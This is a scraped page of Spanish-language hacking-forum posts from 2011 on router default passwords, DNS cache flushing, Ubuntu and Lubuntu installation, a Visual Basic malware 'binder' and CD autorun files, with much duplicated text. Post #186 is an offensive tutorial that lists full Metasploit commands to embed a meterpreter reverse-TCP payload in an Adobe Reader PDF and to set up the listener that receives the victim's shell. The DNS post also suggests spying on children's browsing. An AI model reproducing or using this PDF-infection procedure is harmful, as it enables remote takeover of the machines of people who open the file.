- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Crear archivos nuevos, escribirlos, borrarlos
- Crear archivos nuevos, escribirlos, borrarlos
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Cómo subir archivos al servidor?
- Casos de uso
- ¿Cómo subir archivos al servidor?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Creación de imágenes dinámicas y thumbnails
- Creación de imágenes dinámicas y thumbnails
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Modificadores de fechas
- Manipulación de arreglos (arrays)
- Pasar una cadena de texto a minúsculas, a mayúsculas.
- Modificadores de fechas
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son las expresiones regulares?
- ¿Cuándo utilizarlas?
- Funciones de php para expresiones regulares
- ¿Qué son las expresiones regulares?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Introducción al sistema, explicando los diferentes niveles de accesos y permisos de usuarios
- Diferentes características del contenido
- ¿Qué es el FrontEnd? ¿Qué es el BackEnd?
- Introducción al sistema, explicando los diferentes niveles de accesos y permisos de usuarios
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Creacion de la base de datos
- ¿Por qué de esta forma?
- Creacion de la base de datos
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Creación de nuestro sistema de registro
- Creación de nuestro sistema de registro
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Formulario de ingreso
- Uso de sesiones para reconocer usuarios online
- Diferentes niveles de acceso
- Formulario de ingreso
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Categorías dentro de nuestro blog
- ¿Cómo crear nuevas categorías?
- Categorías dentro de nuestro blog
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Modificar y borrar categorías ya existentes
- Modificar y borrar categorías ya existentes
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Sistema de alta de noticias en nuestro blog (BackEnd)
- Mostrando las noticias en el blog (FrontEnd)
- Sistema de alta de noticias en nuestro blog (BackEnd)
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Modificaciones en las noticias
- Borrado de noticias
- Modificaciones en las noticias
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Alta de comentarios por parte de los usuarios registrados
- Alta de comentarios por parte de los usuarios registrados
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Aprobar o borrar comentarios realizados por los usuarios (solo los administradores)
- Aprobar o borrar comentarios realizados por los usuarios (solo los administradores)
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Palabras finales del curso
#182
Seguridad Wireless / Contraseñas por Defecto en Routers
Septiembre 02, 2011, 02:25:54 PM
Encontré una bonita página donde puedes escoger el modelo del router el cual quieres obtener la password que trae por defecto y te muestra una lista con los diferentes modelos y las posibles contraseñas.
Enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#183
Visual Basic / Vídeotutorial: Crear Binder en Visual Basic 2008
Septiembre 02, 2011, 11:04:31 AMBinder (Builder + Stub) en Visual Basic 2008
Builder:
Stub:
Fuente: MundoHacking
Autor: Ibob
#184
Windows / Limpiar la caché de la DNS
Agosto 29, 2011, 06:08:30 PM- En principio todos pensamos que si se borra el Historial del navegador o se hace uso del modo de navegación privada, nadie puede conocer los sitios que hemos visitado ... pero eso no es del todo cierto.
Existe un componente de nuestro
Para consultar estos datos, vamos a Inicio/Ejecutar y allí escribe cmd en la zona Abrir. Pulsamos Aceptar, aparecerá la ventana de Símbolo del sistema, aquí escribe ipconfig/displaydns y pulsamos Enter. Con ello, veremos la caché DNS de los últimos sitios visitados.

Esto nos puede servir por ejemplo para espiar la actividad en internet de nuestros hijos aunque borrren el historial de navegación, por otra parte también puede comprometer nuestra privacidad sobre todo si compartimos nuestro PC con otros familiares o amigos, por lo que puede que nos interese saber cómo borrar/renovar la Caché del DNS.
Para renovar la cache DNS en sistemas Microsoft Windows
(Windows XP, 2003, 2000):- Menú Inicio -> Comando Ejecutar -> tipiar el comando "cmd"
- En el símbolo del sistema escribimos ipconfig/flushdns
- Listo, ahora su sistema tiene la cache DNS renovada.(Windows 7, Vista):
- Pulsamos en inicio y escribimos en la caja de busqueda cmd (no pulses Enter).



- En los resultados de búsqueda que se presentan, botón derecho y clic en "cmd" y en ejecutar como administrador.

- En el símbolo del sistema, escribe ipconfig/flushdns y ahora sí pulsa Enter.

- Si todo es correcto veremos algo como lo que se muestra a continuación:

1.Abra la ventana de terminal (La localización puede variar según la distribución).
2.Renueve sus DNS cache reiniciando el daemon con 'nscd' y restaurandolo con el siguiente comando: /etc/rc.d/init.d/nscd restart
1.O si dese hacerlo de forma manual detenga y inice el "daemon" con los siguientes comandos:[list=1]
- /etc/rc.d/init.d/nscd stop
- /etc/rc.d/init.d/nscd start
10.4 (Tiger)1.Abra su ventana de terminal (Localizada en /Applications/Utilities).
2.Renueve sus DNS cache con las siguientes lineas de comando: lookupd -flushcache
3.Digite "logout" y presione la tecla 'Enter' para cerrar la ventana.10.5 (Leopard)1.Abra su ventana de terminal (Localizada en /Applications/Utilities).
2.Renueve sus DNS cache con las siguientes lineas de comando:: dscacheutil -flushcache
3.Digite "logout" y presione la tecla 'Enter' para cerrar la ventana.
Bien, hasta aquí hemos visto como visualizar la caché DNS y hemos aprendido a limpiarla, pero ...
¿Qué es la caché DNS?
Cuando escribimos una dirección web en el explorador web y presionamos Enter, estamos enviando una consulta a un servidor DNS. Si la consulta es correcta, el sitio web se abrirá; de lo contrario, recibirá un mensaje de error.
El registro de estas consultas correctas e incorrectas se guarda en una ubicación de almacenamiento temporal del equipo denominada caché DNS. DNS comprueba siempre la caché antes de hacer una consulta a un servidor DNS y si encuentra que un registro coincide con la consulta, DNS usa ese registro en lugar de enviar la consulta al servidor. Esto permite que las consultas sean más rápidas y reduce el tráfico de la red e Internet.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta¿Porqué limpiar la caché de la DNS?
Además de lo que ya vimos al principio (Proteger nuestra privacidad) y segun nos cuenta Microsoft en el párrafo de arriba: Cuando visitamos una página web, Windows intenta acelerar la apertura de la misma colocando la información de la DNS de esa web en la caché de la DNS en nuestros PCs.
Esto es normal, hasta que se producen problemas con la Red, el servidor DNS o incluso con la página web en cuestión.
La caché de la DNS almacena en nuestros PCs entradas positivas y negativas.
Las positivas son aquellas en las que la "DNS Lookup" tuvo éxito y pudimos conectar con la web que deseábamos visualizar.
Las entradas negativas son aquellas que quedan registradas como consecuencia de algún intento fallido de la "DNS Lookup" que nos impidió acceder a la página web.El problema surge cuando la caché de la DNS guarda esas entradas negativas y, aunque la web ya se encuentre disponible y se pueda acceder sin problemas, Windows nos seguirá indicando "DNS ERROR!".
Es por ello que para solucionar este problema y evitar que esas entradas negativas se acumulen en la caché de la DNS del PC, deberemos hacer limpieza de vez en cuando, como ya expliqué más arriba.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Qué es el DNS
Domain Name System o DNS (en español: sistema de nombres de dominio) es un sistema de nomenclatura jerárquica para computadoras, servicios o cualquier recurso conectado a Internet o a una red privada. Este sistema asocia información variada con nombres de dominios asignado a cada uno de los participantes. Su función más importante, es traducir (resolver) nombres inteligibles para los humanos en identificadores binarios asociados con los equipos conectados a la red, esto con el propósito de poder localizar y direccionar estos equipos mundialmente.
El DNS es una base de datos distribuida y jerárquica que almacena información asociada a nombres de dominio en redes como Internet. Aunque como base de datos el DNS es capaz de asociar diferentes tipos de información a cada nombre, los usos más comunes son la asignación de nombres de dominio a direcciones IP y la localización de los servidores de correo electrónico de cada dominio.
La asignación de nombres a direcciones IP es ciertamente la función más conocida de los protocolos DNS. Por ejemplo, si la dirección IP del sitio FTP de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta es 200.64.128.4, la mayoría de la gente llega a este equipo especificando No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y no la dirección IP. Además de ser más fácil de recordar, el nombre es más fiable. La dirección numérica podría cambiar por muchas razones, sin que tenga que cambiar el nombre.
Inicialmente, el DNS nació de la necesidad de recordar fácilmente los nombres de todos los servidores conectados a Internet. En un inicio, SRI (ahora SRI International) alojaba un archivo llamado HOSTS que contenía todos los nombres de dominio conocidos (técnicamente, este archivo existe - la mayoría de los sistemas operativos actuales pueden ser configurados para revisar su archivo hosts). El crecimiento explosivo de la red causó que el sistema de nombres centralizado en el archivo hosts no resultara práctico y en 1983, Paul Mockapetris publicó los RFCs 882 y 883 definiendo lo que hoy en día ha evolucionado hacia el DNS moderno. (Estos RFCs han quedado obsoletos por la publicación en 1987 de los RFCs 1034 y 1035).

Más info: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#185
GNU/Linux / Tutorial: Como instalar Linux "Ubuntu" junto a Windows
Agosto 24, 2011, 01:45:53 PM
Con la llegada de la nueva versión de Linux Ubuntu llegan nuevos manuales de instalación para la colección en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.Info. Anteriormente vimos artículos como ... No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y después fue ... No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.
Para esta nueva versión 8.10 de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta no podía faltar un manual de instalación detallado para aquellos que se quieran iniciar en este sistema operativo que está dando tanto de que hablar. La mayoría de personas que les pica la curiosidad de probar otro sistema que no sea Windows tiene miedo al no saber, al no adaptarse, y básicamente a no defenderse en condiciones con Linux. Esto es lo que me dicen todas las personas que me preguntan sobre que tal es Linux. Por ello y para ellos voy a explicar como se instalan estos dos sistemas en el mismo ordenador desde cero.
Personalmente no soy partidario de explicar nada sobre Windows pero seguro que mas de uno se anima a probarlo acompañado de Windows y adaptarse poco a poco a Linux. A todos los que me habéis pedido este manual ... Va por vosotros

Yo voy a usar mi ordenador portátil que tiene un disco duro de 80 Gb y así aprovecho, lo limpio un poco que hace mucho tiempo que no lo formateo. Te invito a que hagas tu lo mismo con tu portátil o equipo de sobremesa !
¿ Que necesitamos ?
CD de instalación de Windows XP + Drivers *Esto tienes que tenerlo tu, yo no puedo decirte de donde sacarlo.
CD de instalación de Linux Ubuntu *Puedes descargarte No tienes permitido ver enlaces. Registrate o Entra a tu cuenta o No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y quemar la imagen en un CD, completamente gratis claro !!
Una vez tengamos esos dos CDs aseguraos de que tenéis todos datos que necesitáis de vuestro ordenador bien a salvo en un disco duro extraíble o DVDs ya que en el siguiente manual que veremos a continuación vamos a eliminar todas las particiones existentes, así tendremos el ordenador completamente nuevo una vez finalice con la instalación de ambos.
El primer sistema operativo que vamos a instalar de los dos va a ser Windows XP ya que después instalaremos Linux Ubuntu que es quien nos va a instalar el menú Grub que será quien nos pregunte el sistema operativo que deseamos arrancar en nuestro PC finalmente.
Para comenzar insertamos el CD de Window XP en la unidad y arrancamos el ordenador, en unos minutos veremos la siguiente pantalla ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
A continuación presionamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Aceptamos la licencia pulsando la tecla F8 ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seguidamente pulsamos la tecla escape ESC ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Como podéis ver tenemos a la vista todas las particiones de nuestro disco duro. Como os decía al principio de este articulo, vamos a borrarlo todo y ponerlo todo nuevo. Para borrar todas las particiones debemos eliminarlas una a una en caso que tengamos varias situándonos en la partición que queramos borrar y pulsando la tecla D ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pulsamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
pulsamos la tecla L ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y así tantas veces como necesitemos hasta tener nuestro disco duro totalmente limpio de particiones ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez tengamos limpio nuestro disco duro vamos a crear la partición donde instalaremos Windows XP con la tecla C ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En la siguiente casilla vemos la totalidad de nuestro disco duro especificada en MegaBytes. He aquí donde tenemos que decirle cuanto espacio de disco duro necesitamos para Windows XP. En mi caso voy a darle 20 Gb que será lo mismo que 20000 MegaBytes ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez introducido el numero en MegaBytes pulsamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Como veis ya tenemos una partición preparada para instalar Windows XP. Nos situamos sobre ella y pulsamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En este apartado vamos a indicarle el sistema de ficheros, FAT o NTFS, ninguno de los dos me gusta pero si tengo que elegir me quedo con NTFS. Pulsamos la tecla Enter y comenzará el formateo ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
El solo formateará e instalará el sistema. Los siguientes pasos hasta completar la instalación de Windows XP son muy sencillos, tan solo tenéis que leer y siguiente, siguiente, siguiente y mas siguiente hasta llegar a esta pantalla ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pulsamos sobre el botón Inicio -> Apagar ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Extraemos el CD de instalación de Windows XP e insertamos el CD de instalación de Linux Ubuntu y pulsamos sobre el botón Reiniciar ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
El sistema reiniciará y cargará la pantalla inicial del instalador de Linux Ubuntu ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seleccionamos el idioma deseado y pulsamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
A continuación seleccionamos la opción Instalar Ubuntu ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Instalando ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seleccionamos el idioma deseado y pulsamos sobre el botón Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seleccionamos nuestro país y pulsamos sobre el botón Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seleccionamos el idioma de nuestro teclado y continuamos con Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hemos llegado al apartado de el particionado de discos, al igual que hicimos cuando instalamos Windows XP ahora vamos crear las particiones donde irá instalado nuestro nuevo y flamante Linux Ubuntu de ultima generación.
Para los ya familiarizados en el tema podéis comprobar que de una versión a otra hay cambios siempre y aquí podemos ver uno muy notable gráficamente.
Como supongo que este manual lo están leyendo usuarios nuevos en Linux, vamos a facilitar las cosas aun mas simplemente usando la tercera opción Guiado para que ocupe el resto del disco que dejamos libre.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Seleccionamos la tercera opción y continuamos con el botón Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Rellenamos las casillas con el nombre de usuario que queramos usar en esta maquina, password y nombre para el equipo continuando con el botón Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ignoramos esta opción ya que el Windows XP que instalamos antes está nuevo y no hay nada para migrar. Continuamos con el botón Adelante ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En esta ventana nos muestra información sobre todo lo que el sistema va a hacer. Una vez revisado que todo esté correcto continuamos con el botón Instalar ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
El proceso de instalación puede variar dependiendo de la conexión a Internet que tengas y de lo rápida que sea tu maquina. Si no tienes conexión a Internet no hay problema, pero es recomendable que si estabas conectado a tu Router dejalo como estaba y si no pues tranquilo ya este proceso se toma su tiempo ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si ves que se demora mucho no desesperes ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez completado el proceso de instalación pulsamos sobre el botón Reiniciar ahora y el sistema se cerrará hasta explusarnos el CD de instalación de Linux Ubuntu. Extraemos el CD y pulsamos la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Como podeis ver nos aparece un menú donde nos deja escojer que sistema operativo queremos arrancar. Como este manual ha sido creado para introducir a los usuarios de Windows hacia Linux sin tener miedo de no volver otra vez a su sistema si es que hay algo que no sepan hacer en Windows vamos a arrancar nuestro nuevo Linux Ubuntu seleccionándolo y pulsando la tecla Enter ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Cargando ...
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Para iniciar el sistema debemos introducir los datos que anteriormente en la instalación le dimos para el usuario
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y listo !!! Tan solo nos queda conectar el cable de red y ya lo tenemos preparado para funcionar.
Despues de unos minutos este es el aspecto de mi distribucion Linux Ubuntu recien instalada

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Podeis tocar, probar, examinar, indagar, trastear y lo que se os ocurra ya que si algo se rompre siempre estará aquí este manual sobre como se instalar Windows XP y Linux Ubuntu en el mismo ordenador. No tengais miedo y tocarlo todo para aprender ya que ahora teneis una carta en la manga, bueno mejor dicho en Internet.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#186
Hacking / Infectar PDF [Video Tutorial]
Agosto 24, 2011, 10:15:55 AM
Hola amigos aqui les dejo un vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:
Video Youtube:
Aquí está el comando y entre corchetes [] la explicación:
Código: text
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Video Youtube:
Aquí está el comando y entre corchetes [] la explicación:
Shell - Konsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit
Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:
Shell - Konsole
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#187
GNU/Linux / Revive tu PC vieja con Lubuntu
Agosto 19, 2011, 05:11:39 PMTodos en casa, o al menos muchos guardamos en una esquina ese viejo ordenador, que por ser de hace algunos años ha quedado obsoleto, quizas con un viejo Windows 98. y nos preguntamos; Que hacer con ese pedazo de chatarra?
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ningun sistema Operativo, mas que algunas distros de linux muy light soportan tecnologias tan antiguas, sin embargo, dichas distros usualmente no estan diseñadas para ser, "Amigables". Es por eso, que hoy vengo a presentarles un proyecto de la familia de Ubuntu. Y su nombre es Lubuntu
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lubuntu No es mas que una distribucion derivada de Ubuntu, su lema es "menos recursos y más eficiencia energética" Usa un entorno de escritios LXDE y El nombre Lubuntu es una combinación entre LXDE y Ubuntu.
Ademas de ser una distribucion que tiene unos requerimientos minimos apenas superiores a los de windows 98, es ideal para netbooks o miniportatiles de ultima generacion, es "Eficiente" en cuanto al consumo de enrgia. digamos "verde"
[/url]
Pero no se confundan, el no devorar recursos del sistema, no quiere decir que la interfaz sea poco amigable para el usuario. por el contrario, tiene un look, muy clean. Que convertira nuestro viejo PC en uno corriendo un S.O de ultima generacion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si bien el sistema operativo no require mas de unos 50mb de ram para funcionar bien, el software adicional, Si requiere algunos recursos adicionales, sobre todo software como Firefox. Es por ello, que en Lubuntu, vemos una siute de elementos optimizados para el maximo desempeño en una maquina con recursos limitados.
Alternativas como Open Office son relativamente "Pesadas" en contraste con el lema de Lubuntu, por lo que no se incluyen por defecto con la distribucion, Que cuenta con una suite de oficina un poco mas "ligera"
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Entre el software que incluye el .iso se incluye lo necesario para hacer revivir esa vieja PC y hacerla totalmente operativa.
Es una buena opcion para que saques provecho aun al hardware que tienes olvidado tras haberse vuelto "Obsoleto" El iso, pesa solo 350 mb, por lo que es extremadamente liviano, adicionalmente. Es Live-CD por lo que puedes probar la distro sin instalarla siquiera.
Lubuntu ha sido probado en:

Así que si tu PC, supera o bien tiene capacidades similares a las antes mencionadas, que estas esperando?
Link de Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta(aun en fase alfa)
Para mas Informacion: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Via: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
También disponible el escritior LXDE desde synaptic, si tienes Ubuntu, pero deseas que tu PC vuele.
NOTA DEL AUTOR: Tambien esta disponible Xubuntu, como una alternativa para Revivir una vieja PC, sus requerimientos minimos son algo superiores a los de Lubuntu, pero igual, muy bajos.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Procesador : Pentium II
Ram : 64Mb (Si se instala con el alternate CD)
Disco duro : 1.5GB
Web Oficial : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Comentarios : Basada en Ubuntu, es una de las mas conocidas y posee un balance perfecto entre capacidades, apariencia y rendimiento. Se acutualiza cada 6 meses.
Descarga : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Cuenta con versiones estables que salen cada 6 meses, por lo que es una excelente alternativa si quieres probar algo mas robusto y estable.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ningun sistema Operativo, mas que algunas distros de linux muy light soportan tecnologias tan antiguas, sin embargo, dichas distros usualmente no estan diseñadas para ser, "Amigables". Es por eso, que hoy vengo a presentarles un proyecto de la familia de Ubuntu. Y su nombre es Lubuntu
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lubuntu No es mas que una distribucion derivada de Ubuntu, su lema es "menos recursos y más eficiencia energética" Usa un entorno de escritios LXDE y El nombre Lubuntu es una combinación entre LXDE y Ubuntu.
Ademas de ser una distribucion que tiene unos requerimientos minimos apenas superiores a los de windows 98, es ideal para netbooks o miniportatiles de ultima generacion, es "Eficiente" en cuanto al consumo de enrgia. digamos "verde"
[/url]
Pero no se confundan, el no devorar recursos del sistema, no quiere decir que la interfaz sea poco amigable para el usuario. por el contrario, tiene un look, muy clean. Que convertira nuestro viejo PC en uno corriendo un S.O de ultima generacion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si bien el sistema operativo no require mas de unos 50mb de ram para funcionar bien, el software adicional, Si requiere algunos recursos adicionales, sobre todo software como Firefox. Es por ello, que en Lubuntu, vemos una siute de elementos optimizados para el maximo desempeño en una maquina con recursos limitados.
Alternativas como Open Office son relativamente "Pesadas" en contraste con el lema de Lubuntu, por lo que no se incluyen por defecto con la distribucion, Que cuenta con una suite de oficina un poco mas "ligera"
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Entre el software que incluye el .iso se incluye lo necesario para hacer revivir esa vieja PC y hacerla totalmente operativa.
- Reproductores multimedia
- Clientes de Mensajeria instantanea
- Clientes Bittorrent
- Suite de Oficina
- Navegador web Firefox
- Editor de Imagenes
Es una buena opcion para que saques provecho aun al hardware que tienes olvidado tras haberse vuelto "Obsoleto" El iso, pesa solo 350 mb, por lo que es extremadamente liviano, adicionalmente. Es Live-CD por lo que puedes probar la distro sin instalarla siquiera.
Lubuntu ha sido probado en:

Así que si tu PC, supera o bien tiene capacidades similares a las antes mencionadas, que estas esperando?
Link de Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta(aun en fase alfa)
Para mas Informacion: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Via: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
También disponible el escritior LXDE desde synaptic, si tienes Ubuntu, pero deseas que tu PC vuele.
NOTA DEL AUTOR: Tambien esta disponible Xubuntu, como una alternativa para Revivir una vieja PC, sus requerimientos minimos son algo superiores a los de Lubuntu, pero igual, muy bajos.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Procesador : Pentium II
Ram : 64Mb (Si se instala con el alternate CD)
Disco duro : 1.5GB
Web Oficial : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Comentarios : Basada en Ubuntu, es una de las mas conocidas y posee un balance perfecto entre capacidades, apariencia y rendimiento. Se acutualiza cada 6 meses.
Descarga : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Cuenta con versiones estables que salen cada 6 meses, por lo que es una excelente alternativa si quieres probar algo mas robusto y estable.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#188
Hacking / Manual para crear un CD Autoejecutable [Autoruns]
Agosto 16, 2011, 05:58:53 PM
Cuando deseamos crear un Cd ROM y queremos que este se auto ejecute al introducirlo en la unidad de CD / DVD tenemos que incluir un pequeño archivo en el Directorio del CD. El archivo en cuestión se llamaría AUTORUN.INF . En este manual os daré unos ejemplos de como realizarlo
Este pequeño archivo se crea con el bloc de notas, y una vez creado lo renombramos a AUTORUN.INF el contenido que debemos introducir dentro del archivo es el siguiente:
Código: text
Donde pone "archivo.exe" se tiene que poner el nombre del archivo a ejecutar y donde pone "archivo.ico" ponemos el icono del CD-ROM que veremos al mostrar el contenido de "MiPC".
Ejemplo:
CREAR UN AUTORUN PARA PÁGINA WEB
Para crear un Autorun para una página web, es necesario especificar otro archivo de Windows para que pueda abrir la página, es decir, el Explorador de Windows.
Si no lo haces así y grabas el CD, cuando quieras que se inicie el Autorun, te dirá que no es una aplicación Win32 válida. Por tanto, ten en cuenta estas explicaciones, y sigue el ejemplo que hay más abajo:
Código: text
Fíjate que en el comando OPEN, entre explorer, exe y nombre_página_web.html, hay un espacio. nombre_página_web.html = el nombre de la página web que desee que inicie el autorun
Nombre_archivo_icono.ico = debe introducir el nombre el archivo del icono.
Por ejemplo, si quieres hacer un autorun para un CD, y que el Autorun te inicie una página web llamada "index.html", con un icono para el CD, llamado "icoCD.ico". Tendrás que hacer lo siguiente:
Código: text
Puede que lo que quieras que se ejecute sea un archivo de una determinada aplicación, como por ejemplo un archivo html (o cualquier otro archivo que quieras), entonces tendrás que crear además un archivo BAT (por lotes) que haga que el archivo de la aplicación se pueda auto ejecutar. Los pasos serán primero crear el archivo bat con el bloc de notas, que por ejemplo lo llamamos auto.bat y estará constituido por las dos líneas siguientes:
Código: text
Donde "Indice.htm" es el nombre del archivo que tengas (si es un archivo del Word sería por ejemplo :@explorer chistes.doc, se admite cualquier archivo de windows y siempre que el ordenador donde se use el CD tenga el programa que abre dicho archivo).
Luego debes crear el archivo autorun.inf:
Código: text
Ambos archivos irán en el directorio raíz, así como el archivo htm.
Consejo: antes de grabar el CD pon el archivo "auto" y el archivo que quieras que se abra dentro de la misma carpeta de tu disco duro y ejecuta el archivo .bat para comprobar que abre la aplicación con el archivo elegido, si es así cuando grabes el CD y pongas los 3 archivos anteriores en el directorio raíz no fallará, si no se abre comprueba si tu archivo por lotes .bat realmente tiene extensión .bat y no es "auto.bat.txt" y su contenido es correcto.
AÑADIR OPCIONES AL MENÚ CONTEXTUAL
Otra cosa que se puede hacer desde el fichero AUTORUN.INF es añadir opciones al menú de contexto del CD-ROM (el que sale al pulsar con el botón secundario sobre el icono del CD). Puede resultar interesante dar la opción de "Explorar el contenido del CD" o "Iniciar la instalación de... (un programa cualquiera)". Esto también es fácil:
Código: text
El truco consiste en crear parejas de líneas "SHELL\<clave>" y "SHELL\<clave>\COMMAND" poniendo en la primera el texto que queremos que aparezca en el menú de contexto, y en la segunda la instrucción que queremos que se ejecute al seleccionar la opción.
Este pequeño archivo se crea con el bloc de notas, y una vez creado lo renombramos a AUTORUN.INF el contenido que debemos introducir dentro del archivo es el siguiente:
[autorun]
open=archivo.exe
icon=archivo.ico
Donde pone "archivo.exe" se tiene que poner el nombre del archivo a ejecutar y donde pone "archivo.ico" ponemos el icono del CD-ROM que veremos al mostrar el contenido de "MiPC".
Ejemplo:
CREAR UN AUTORUN PARA PÁGINA WEB
Para crear un Autorun para una página web, es necesario especificar otro archivo de Windows para que pueda abrir la página, es decir, el Explorador de Windows.
Si no lo haces así y grabas el CD, cuando quieras que se inicie el Autorun, te dirá que no es una aplicación Win32 válida. Por tanto, ten en cuenta estas explicaciones, y sigue el ejemplo que hay más abajo:
[autorun]
OPEN=\windows\explorer.exe nombre_página_web.html
ICON=Nombre_archivo_icono.ico
Fíjate que en el comando OPEN, entre explorer, exe y nombre_página_web.html, hay un espacio. nombre_página_web.html = el nombre de la página web que desee que inicie el autorun
Nombre_archivo_icono.ico = debe introducir el nombre el archivo del icono.
